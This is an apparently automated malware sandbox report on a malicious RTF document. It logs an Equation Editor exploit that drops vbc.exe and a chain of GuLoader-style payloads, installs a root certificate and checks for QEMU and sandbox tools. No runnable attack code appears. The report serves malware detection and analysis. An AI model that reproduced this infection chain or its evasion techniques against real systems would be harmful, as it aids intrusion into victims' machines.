            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\AppData\Roaming\misv.exeCode function: 10_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040755C
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00406D85
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_00401724
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00104840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00AC21E7
            Source: C:\Users\user\AppData\Roaming\misv.exeCode function: 10_2_0040755C
            Source: C:\Users\user\AppData\Roaming\misv.exeCode function: 10_2_00406D85
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_00401724
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FF405C
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FECC33
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FF4AA2
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FEC781
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FECC33 NtAllocateVirtualMemory,
            Source: ~WRF{D64CC614-46F7-4260-89D0-504A02C9841B}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess Stats: CPU usage > 98%
            Source: Acly3.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: misv.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeSection loaded: sxs.dll
            Source: C:\Users\user\AppData\Local\Temp\misv.exeSection loaded: sxs.dll
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeMemory allocated: 76E90000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 76E90000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\misv.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\misv.exeMemory allocated: 76E90000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\misv.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\misv.exeMemory allocated: 76E90000 page execute and read and write
            Source: QEw7lxB2iE.rtfVirustotal: Detection: 49%
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Local\Temp\misv.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe"
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess created: C:\Users\user\AppData\Local\Temp\misv.exe C:\Users\user\AppData\Local\Temp\misv.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe"
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess created: C:\Users\user\AppData\Local\Temp\misv.exe C:\Users\user\AppData\Local\Temp\misv.exe
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\AppData\Roaming\misv.exeCode function: 10_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$w7lxB2iE.rtfJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF3EF.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@12/14@3/1
            Source: C:\Users\Public\vbc.exeCode function: 3_2_004021AA CoCreateInstance,
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: CasPol.exe, 00000007.00000002.697620376.000000001E130000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Acly3.pdb source: vbc.exe, 00000003.00000002.428980933.0000000000427000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.428948281.000000000040D000.00000004.00020000.sdmp
            Source: ~WRF{D64CC614-46F7-4260-89D0-504A02C9841B}.tmp.0.drInitial sample: OLE indicators vbamacros = False

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000004.00000002.680879474.0000000000380000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.559197551.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.692913146.0000000002FE0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_0038702C pushad ; retf
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_00380010 pushad ; ret
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_003834D5 push ecx; retf
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_0038371F push edx; ret
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FE43A4 pushad ; retf
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FE435F pushad ; retf
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FE7139 push ds; retf
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FE0E75 push edx; iretd
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FE0DDE push edx; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\misv.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\misv.exeFile created: C:\Users\user\AppData\Local\Temp\misv.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\Acly3.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\misv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\misv.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Acly3.exe, 00000004.00000002.681294928.0000000003950000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: Acly3.exe, 00000004.00000002.681294928.0000000003950000.00000004.00000001.sdmp, CasPol.exe, 00000007.00000002.693461440.00000000007C0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
